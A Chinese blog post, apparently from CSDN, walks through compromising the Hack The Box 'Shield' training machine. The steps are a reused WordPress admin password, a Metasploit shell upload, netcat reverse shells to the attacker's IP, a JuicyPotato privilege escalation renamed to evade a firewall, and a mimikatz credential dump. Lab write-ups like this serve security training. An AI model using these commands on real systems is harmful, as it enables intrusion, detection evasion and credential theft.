渗透测试练习靶场hackthebox——Starting Point Shield攻略

最新推荐文章于 2024-04-19 16:26:53 发布
最新推荐文章于 2024-04-19 16:26:53 发布
阅读量1.1k 收藏 2
点赞数 1
分类专栏: hackthebox
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_48066270/article/details/108811178
版权

目录

扫描

根据给出的IP地址,使用nmap进行扫描

nmap -T4 -F -sV 10.10.10.28
-T4:针对TCP端口禁止动态扫描延迟超过10ms
-F:快速扫描,扫描一些常用端口
-sV:探测开启的端口来获取服务、版本信息

在这里插入图片描述
先去80端口看一下,发现是一个IIS的默认页面

在这里插入图片描述

爆破web目录

在github中下载dirsearch工具来爆破web路径,进入工具的路径下,执行

python3 dirsearch.py -u 10.10.10.29 -e *
-u:指定目标ip
-e:指定扩展名,例如:*.php,*.asp

在这里插入图片描述
发现了/wordpress目录,我们去访问一下,发现有登录入口,先点击右上角BLOG,再点击Log in跳转至wordpress的登陆页面
在这里插入图片描述
在这里插入图片描述
这里我们可以尝试使用之前靶机中使用过的密码尝试登录,发现上一章已经获取的admin:P@s5w0rd!这个组合可以登陆,成功进入到wordpress管理页面

在这里插入图片描述

获取webshell

有了wordpress管理权限,我们可以尝试使用metasploit获取webshell

msfconsole						//进入kali的metasploit攻击框架
search wp_admin					//查找wordpress获取webshell的利用模块
use 0							//使用编号为0的模块
show options					//显示设置需要配置的参数

在这里插入图片描述
Required位置显示yes的都需要配置

在这里插入图片描述
逐一配置参数,运行成功后会自动删除利用过程中上传的payload,并且建立一个meterpreter shell

set PASSWORD P@s5w0rd!
set RHOSTS 10.10.10.29
set TARGETURI /wordpress
set USERNAME admin
set LHOST 10.10.16.4			 //此处为本地地址,可用ifconfig查看
run								 //运行

在这里插入图片描述
由于meterpreter shell不是非常稳定,我们需要利用nc获取一个相对稳定的shell,在kali中自带nc.exe,我们先将其复制到桌面上一份

find / -name "nc.exe"
cp /usr/share/windows-resources/binaries/nc.exe ~/桌面

在这里插入图片描述
再通过meterpreter shell上传至目标机器的uploads目录中

cd ../../uploads
upload nc.exe

在这里插入图片描述
接下来,我们先在kali启动nc并监听7777端口,然后在meterpreter shelluploads目录中执行如下代码后,可以看到nc获取到了shell

execute -f nc.exe -a "-e cmd.exe 10.10.16.4 7777"
-f:执行-f参数所指定的文件
-a:传递给命令的参数
-e:命令netcat执行某个程序,常用于后门建立过程

在这里插入图片描述
在这里插入图片描述

提权

我们回到meterpreter shell中,执行命令sysinfo,发现系统为Windows Server 2016,此系统容易受到Rotten Potato攻击,原理见:https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/

在这里插入图片描述

首先我们在github中下载利用工具juicy-potato并重新命名为js.exe防止防火墙检测到,再用meterpreter shell将js.exe上传到uploads文件夹内

upload js.exe

在这里插入图片描述
接着用刚才获取到的nc shell在目标机器上生成一个批处理文件,目的是让netcat将靶机的powershell发送至kali的1111端口

echo START C:\inetpub\wwwroot\wordpress\wp-content\uploads\nc.exe -e powershell.exe 10.10.16.4 1111 > shell.bat

在这里插入图片描述
然后再次在kali中启动一个nc并监听1111端口来接收提权后的nc shell,并在获取的nc shell中运行js.exe

js.exe -t * -p C:\inetpub\wwwroot\wordpress\wp-content\uploads\shell.bat -l 1337
-t *:创建使用TokenW和User两种模式的进程
-p:指定要运行的程序(无法传递带参数的命令,所以要提前用bat写好)
-l:COM服务监听的端口

在这里插入图片描述
此时回到kali中监听1111端口的nc中,执行whoami命令,发现已经获得了SYSTEM权限的shell

在这里插入图片描述
此时我们有三个shell,在kali中分别是:4444端口的meterpreter shell、7777端口的普通权限的nc shell、1111端口的SYSTEM权限的nc shell

获取flag

利用SYSTEM权限的nc shell,进入桌面中,即可在root.txt中获取flag

cd c:\users\administrator\desktop
dir
cat root.txt

在这里插入图片描述

后续

我们可以在github中下载mimikatz,并同样用meterpreter shell上传到uploads目录下(过程省略),来获取域用户信息,然后使用SYSTEM权限的nc shell使用这个工具

cd c:\inetpub\wwwroot\wordpress\wp-content\uploads
./mimikatz.exe
sekurlsa::logonpasswords

在这里插入图片描述
即可获取域用户信息Sandra的和其明文登陆密码sandra:Password1234!,用于下一个靶机

在这里插入图片描述

完结

如有疑问,可在评论区内提出,我会尽力解答。
如有错误,欢迎指正。
感谢观看!

TF0xn
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透测试练习靶场hackthebox——Starting Point Archetype
TF0xn的博客
09-15 3028
目录连接配置扫描测试445端口连接数据库获取RCE 连接配置 选择EU或USA后,点击上方Download Connection Pack,下载xxxxx.ovpn,在命令行内键入:openvpn xxxxx.ovpn 如图所示,就连接成功了 扫描 根据网站提示,我们需要扫描10.10.10.27,使用nmap进行扫描:nmap -sC -sV 10.10.10.27 -sC:使用默认脚本进行扫描,等同于–script=default -sV:探测开启的端口来获取服务、版本信息 可以发现,目标开启
0x03-HackTheBox-Shield
0pr
04-22 528
Shield Video Walkthrough!???? 个人博客地址 Via今天回来继续 HackTheBox 系列。有事耽误了两天。前两天发现 Vaccine 这个机器老是会出现网络问题,我就跳过不做了。那么今天就是 Shield。 目标机器在IP地址 10.10.10.29。 Recon Nmap 只有 80 和 3306 端口开着,一个网站,加一个 mysql server。 击者可以继...
记第一次打hack the box靶场之Meow靶机
最新发布
shurongyugong的博客
04-19 135
hack the box靶场之Meow靶机
Hackthebox Trikc
qq_44641654的博客
10-13 533
HTB Trick通关姿势
Hackthebox Shoppy
qq_44641654的博客
10-01 2250
HTB Shoppy的通关姿势
Hack the box shield
qq_41696858的博客
07-04 107
这一台靶机需要用到上一台靶机的地方是上一台靶机数据库用户的密码 1.日常操作,NMAP扫ip nmap -sC -sV 10.10.10.29就扫出来一个80端口 2.浏览器页面源码审计,看到了wordpress wp-contents之类的路径,那么wordpress是八九不离十了,为了确认以下还可以扫一下路径,gobuster和dirsearch二选一 gobuster dir -u http://10.10.10.29 -w /usr/share/wordlists/dirb/common.txt d
hackeeg-shield-1-master_hack_EEG_ADS1299_
09-29
标题中的“hackeeg-shield-1-master_hack_EEG_ADS1299_”表明这是一个关于EEG(脑电图) shield 的项目,基于TI公司的ADS1299芯片,且处于开发的master分支。这个项目可能是为了黑客马拉松或者爱好者社区设计,允许...
【2期】PHP代码审计基础——大咖SHIELD分享.rar
07-28
漏洞银行“大咖面对面”录屏+资料 持续更新中…… 大咖经验在线分享、行业热点开放交流、技术思维倾囊相授 “大咖面对面”信息安全技术公益讲座由漏洞银行方主办 漏洞银行平台(BUGBANK),国内首家互联网安全服务SAAS...
组件测试仪UNO Shield-电路方案
04-20
介绍组件测试器UNO Shield与USB组件测试器类似的功能,所有通孔组件和一个小按钮可从电路板本身触发测试。它使您可以灵活地通过标准Arduino UNO USB电缆上传代码。因此,您无需重新刷新引导加载程序。尽管Arduino的...
组件测试仪UNO Shield-项目开发
03-31
标题中的“组件测试仪UNO Shield-项目开发”是指一种基于Arduino UNO的硬件扩展板,专门用于测试各种电子组件的工具。这个测试仪能够帮助开发者在项目开发过程中验证和调试他们的电路设计,确保所有使用的电子元件都...
Shield 03_Shield03_
09-28
标题中的"Shield 03_Shield03_"可能是指一个针对muonline(一款多人在线角色扮演游戏)的3D模型对象,具体来说是一个盾牌。在游戏设计和开发中,3D模型是创建虚拟环境和角色的重要元素,它们为玩家提供视觉体验。...
渗透测试练习靶场hackthebox——Starting Point Pathfinder(详细版本)
weixin_42109829的博客
09-08 4717
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
Hack The Box Starting Point 渗透测试入门靶场 TIER 2 - Oopsie
Start C的博客
05-18 566
每当执行包含身份验证机制的 Web 评估时,始终建议检查 cookie、会话并尝试弄清楚访问控制的真正工作原理。 在许多情况下,远程代码执行击和系统立足点本身可能无法实现,而是在链接不同类型的漏洞和漏洞之后实现。 在此框中,我们将了解信息泄露和访问控制损坏类型的漏洞,即使它们看起来不是很重要,也会在击系统时产生很大的影响,因此即使是很小的漏洞也很重要。 先扫描一下:namp -sV -sC 10.129.133.42 开放了3个TCP端口,22 ssh,80 http,还有一个10626。 既然有8.
Hack The Box : Starting Point - Oopsie
qq_60201815的博客
09-04 411
环境准备 击机:kali-linux 靶机:Archetype --------------------------------------------------------------------------------------------------------------------------------- 需要下载的工具:dirsearch ----------------------------------------------------------------------
HackTheBox靶场系列(一)之HackTheBox靶场简介
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
11-30 3171
Hack The Box是国外的一个网络安全在线平台,允许用户实践渗透测试技能,并与其他类似兴趣的成员交流想法和方法。它包含一些不断更新的挑战,其中有许多模拟真实场景的机器。HackTheBox靶场是一个虚拟的渗透测试训练平台,用于帮助安全研究人员、渗透测试人员和学生提高他们的技能。它包含一系列的虚拟机,其中每一个虚拟机都代表一个可击的目标系统。通过击这些虚拟机和解决它们的漏洞,用户可以提高自己的技能和知识,以更好地了解实际环境中的击和防御。
Hackthebox靶场---Undetected 实战(难)
weixin_51339377的博客
04-24 4243
正常思路 nmap进行端口扫描 发现开放了80和22端口 网站进入80端口 是一个珠宝网站 发现点击store会重定向到其他的url http://store.djewelry.htb/ 我们首先用dirsearch扫描一下 然而并没有发现什么有用的,也跟基本主界面测试差不多 除了store可能有可以利用的地方 我们不妨把这个未知url的地址也dns解析到这个ip地址 执行以下命令即可 echo 10.10.11.146 djewelry.htb store.dj...
Hack The Box - Curling Writeup
qq_23026851的博客
02-02 1673
获得这个box的user很容易,root.txt也其实不难,但是如何获得root shell还有待研究。总之,先记录下过程。 用Nmap + Nikto对目标机进行扫描。 系统用的是Joomla! 3.8.8,且发现了admin登陆页面/administrator/index.php。不需要exploit这个界面,因为80端口上的网页源代码中提示了有secret.txt。 Base64解码后...
hack the box靶场练习之shocker
qq_44767905的博客
02-02 219
hackthebox之shocker
hackthebox】【Challenges】【Lernaean】
大方子
02-01 1351
一个来自HTB的web挑战 提示语:你的目标对计算机不是很好。尝试并猜测他们的密码,看看他们是否隐藏任何东西! 打开页面,出现“Please do not try to guess my password!” 那么我们用hydra来爆破下 hydra -l admin -P /usr/share/wordlists/rockyou.txt -t 64 docker.hackth...
VTS_99_ECU_Tests_with_VT_System_Exercises.pdf
12-09
"VTS_99_ECU_Tests_with_VT_System_Exercises.pdf" 是一个关于使用VT系统进行车载电子控制单元(ECU)测试的训练材料,内容涵盖了全面的测试覆盖率、EVS(电动汽车系统)通信、训练环境、传感器输入、灯光输出以及与...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值